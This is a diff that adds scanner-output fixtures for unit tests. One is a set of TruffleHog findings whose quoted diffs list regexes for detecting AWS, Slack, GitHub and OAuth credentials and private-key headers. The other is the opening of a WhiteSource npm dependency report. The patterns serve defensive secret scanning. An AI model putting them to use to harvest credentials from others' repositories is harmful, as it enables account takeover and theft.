re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Update regexChecks.py", "commitHash": "b6073aafed119255301571cf8ff1ea43ede87c95", "date": "2017-12-08 17:38:45", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Update regexChecks.py", "commitHash": "b6073aafed119255301571cf8ff1ea43ede87c95", "date": "2017-12-08 17:38:45", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Update regexChecks.py", "commitHash": "b6073aafed119255301571cf8ff1ea43ede87c95", "date": "2017-12-08 17:38:45", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Update regexChecks.py", "commitHash": "b6073aafed119255301571cf8ff1ea43ede87c95", "date": "2017-12-08 17:38:45", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "tweaking regex\n", "commitHash": "0653620019e670ac1fe2565ca87eb2297f3cc01a", "date": "2017-10-31 03:06:22", "diff": "@@ -4,11 +4,9 @@ regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[0-9a-f]{32}'),\n+ \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[0-9a-zA-Z]{35,44}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n- \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n+ \"AWS API Key\": re.compile('[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "adding some more signals\n", "commitHash": "e1d329e58ae387b1b9a2599a9b418ed0aa71a73e", "date": "2017-10-11 06:15:41", "diff": "@@ -3,10 +3,7 @@ import re\n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n- \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[0-9a-f]{32}'),\n- \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[0-9a-zA-Z]{35,44}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"AWS API Key\": re.compile('[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}')\n+ \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----", "-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "adding regex support\n", "commitHash": "8ab1422ed7e109b9fc1dd012bfd844e8e0293fbb", "date": "2017-10-08 10:25:35", "diff": "@@ -1,9 +0,0 @@\n-import re\n-\n-regexes = {\n- \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n- \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----')\n-}\n-\n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/paths", "commit": "adding configurable rules and making the library import better\n", "commitHash": "5717db6fa94ea13244edfa37f9f62d1856db8aca", "date": "2018-01-14 23:56:27", "diff": "@@ -1,3 +0,0 @@\n-{\n- \"RSA private key\": \"-----BEGIN EC PRIVATE KEY-----\"\n-}\n", "path": "testRules.json", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} diff --git a/unittests/scans/whitesource_sample/cli_generated_many_vulns.json b/unittests/scans/whitesource_sample/cli_generated_many_vulns.json new file mode 100644 index 00000000000..255632c4700 --- /dev/null +++ b/unittests/scans/whitesource_sample/cli_generated_many_vulns.json @@ -0,0 +1,27208 @@ +{ + "projectVitals": { + "productName": "test", + "name": "https://github.com/test/test-project", + "token": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0dcad4cd614739aec3e3cb64d835b5", + "creationDate": "2019-06-07 09:08:06", + "lastUpdatedDate": "2019-12-03 08:49:19" + }, + "libraries": [ + { + "keyUuid": "38260bc2-4fab-4d1f-918b-7142822fbb84", + "keyId": 27081386, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", + "homePage": "https://github.com/isaacs/node-lru-cache#readme", + "genericPackageIndex": "https://www.npmjs.org/package/lru-cache" + }, + "matchType": "SHA1", + "sha1": "1da27e6710271947695daf6848e847f01d84b920", + "name": "lru-cache-5.1.1.tgz", + "artifactId": "lru-cache-5.1.1.tgz", + "version": "5.1.1", + "groupId": "lru-cache", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f52c96e8-ec76-4601-9efc-d8f34fd1bb68" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5a1c11e1-f768-4d36-96b6-96cc6928f758", + "keyId": 27547513, + "type": "SOURCE_LIBRARY", + "languages": "C++", + "references": { + "url": "https://github.com/nodejs/nan.git", + "downloadLink": "https://github.com/nodejs/nan/zipball/v2.14.0" + }, + "matchType": "SOURCE_FILE", + "sha1": "1dcc61bd06d84e389bfd5311b2b1492a14c74201", + "name": "nan-v2.14.0", + "artifactId": "nan", + "version": "v2.14.0", + "groupId": "nodejs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "License File", + "reference": "License File (https://github.com/nodejs/nan/blob/v2.14.0/package.json)" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "748ac883-61cc-4c99-baee-864c43ab4654", + "keyId": 26955298, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-map-url/-/source-map-url-0.4.0.tgz", + "homePage": "https://github.com/lydell/source-map-url#readme", + "genericPackageIndex": "https://www.npmjs.org/package/source-map-url" + }, + "matchType": "SHA1", + "sha1": "3e935d7ddd73631b97659956d55128e87b5084a3", + "name": "source-map-url-0.4.0.tgz", + "artifactId": "source-map-url-0.4.0.tgz", + "version": "0.4.0", + "groupId": "source-map-url", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2a41e5d5-6515-4338-af18-d70ff426b63d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cfec0ec4-995f-4c10-be29-e963f0320b17", + "keyId": 26966784, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz", + "homePage": "https://github.com/calvinmetcalf/minimalistic-assert", + "genericPackageIndex": "https://www.npmjs.org/package/minimalistic-assert" + }, + "matchType": "SHA1", + "sha1": "2e194de044626d4a10e7f7fbc00ce73e83e4d5c7", + "name": "minimalistic-assert-1.0.1.tgz", + "artifactId": "minimalistic-assert-1.0.1.tgz", + "version": "1.0.1", + "groupId": "minimalistic-assert", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/minimalistic-assert" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f8b01e7d-211c-4a7e-b7d2-b0a962c3c004", + "keyId": 26955402, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/array-find-index/-/array-find-index-1.0.2.tgz", + "homePage": "https://github.com/sindresorhus/array-find-index#readme", + "genericPackageIndex": "https://www.npmjs.org/package/array-find-index" + }, + "matchType": "SHA1", + "sha1": "df010aa1287e164bbda6f9723b0a96a1ec4187a1", + "name": "array-find-index-1.0.2.tgz", + "artifactId": "array-find-index-1.0.2.tgz", + "version": "1.0.2", + "groupId": "array-find-index", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/array-find-index" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "baa7a625-38f6-4470-b4c0-55707a11d3bb", + "keyId": 26948674, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz", + "homePage": "https://github.com/chalk/ansi-regex#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-regex" + }, + "matchType": "SHA1", + "sha1": "c3b33ab5ee360d86e0e628f0468ae7ef27d654df", + "name": "ansi-regex-2.1.1.tgz", + "artifactId": "ansi-regex-2.1.1.tgz", + "version": "2.1.1", + "groupId": "ansi-regex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-regex/v/2.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1181a303-ff84-4ae5-95b5-87cf8a171faa", + "keyId": 27389514, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "homePage": "https://github.com/pillarjs/parseurl#readme", + "genericPackageIndex": "https://www.npmjs.org/package/parseurl" + }, + "matchType": "SHA1", + "sha1": "9da19e7bee8d12dff0513ed5b76957793bc2e8d4", + "name": "parseurl-1.3.3.tgz", + "artifactId": "parseurl-1.3.3.tgz", + "version": "1.3.3", + "groupId": "parseurl", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/parseurl" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "784eb99e-c952-4ffd-9eee-79a1ffb527af", + "keyId": 27607431, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@segment/snippet/-/snippet-4.4.0.tgz", + "homePage": "https://github.com/segmentio/snippet#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@segment/snippet" + }, + "matchType": "SHA1", + "sha1": "153f17b8048a2764bbb1343a61f3c3c24da038e2", + "name": "snippet-4.4.0.tgz", + "artifactId": "snippet-4.4.0.tgz", + "version": "4.4.0", + "groupId": "@segment/snippet", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@segment/snippet" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0abddca0-0f2b-4af2-b78a-33ba5fceb816", + "keyId": 26963135, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "homePage": "https://github.com/Qix-/color-convert#readme", + "genericPackageIndex": "https://www.npmjs.org/package/color-convert" + }, + "matchType": "SHA1", + "sha1": "bb71850690e1f136567de629d2d5471deda4c1e8", + "name": "color-convert-1.9.3.tgz", + "artifactId": "color-convert-1.9.3.tgz", + "version": "1.9.3", + "groupId": "color-convert", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/color-convert" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b307138e-b213-423f-b380-ff6179d92db1", + "keyId": 26958367, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", + "homePage": "https://github.com/jshttp/methods", + "genericPackageIndex": "https://www.npmjs.org/package/methods" + }, + "matchType": "SHA1", + "sha1": "5529a4d67654134edcc5266656835b0f851afcee", + "name": "methods-1.1.2.tgz", + "artifactId": "methods-1.1.2.tgz", + "version": "1.1.2", + "groupId": "methods", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a8691e41-2612-4353-a047-c278e11c022b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ee14cea5-7c86-4cdb-b307-fc87b2bae5e6", + "keyId": 27280540, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": 